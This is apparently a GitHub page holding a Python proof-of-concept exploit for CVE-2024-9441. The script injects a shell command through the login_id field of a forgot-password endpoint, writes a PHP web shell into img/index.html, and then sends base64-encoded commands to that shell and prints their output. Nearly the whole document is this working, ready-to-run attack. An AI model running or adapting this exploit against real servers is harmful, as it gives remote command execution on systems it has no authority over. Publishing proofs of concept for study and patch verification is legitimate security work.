-
Notifications
You must be signed in to change notification settings - Fork 0
/
Poc-CVE-2024-9441.py
45 lines (32 loc) · 1.41 KB
/
Poc-CVE-2024-9441.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
import base64
import sys
import logging
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
logging.basicConfig(level=logging.INFO)
if len(sys.argv) != 2:
print("Usage: python exploit.py <command>")
sys.exit(1)
target = "https://yourIP:port"
url = target + "/index.php?c=user&m=forgot_password"
PAYLOAD = {
'login_id': '`echo \'<?php exec(base64_decode($_POST["c"]),$output);echo(implode("\n",$output));?>\' > img/index.html`'}
try:
req = requests.post(url, data=PAYLOAD, verify=False, timeout=10)
if req.status_code == 200:
logging.info("Payload injected successfully.")
cmd = sys.argv[1].encode('utf-8')
enc_cmd = base64.b64encode(cmd).decode('utf-8')
PAYLOAD_CMD = {'c': enc_cmd}
req_cmd = requests.post(target + "/img/index.html", data=PAYLOAD_CMD, verify=False, timeout=10)
if req_cmd.status_code == 200:
print(req_cmd.text)
else:
logging.error(f"Exploit failed with status code: {req_cmd.status_code}")
else:
logging.error(f"Initial payload injection failed with status code: {req.status_code}")
except requests.exceptions.Timeout:
logging.error("Request timed out.")
except requests.exceptions.RequestException as e:
logging.error(f"An error occurred: {e}")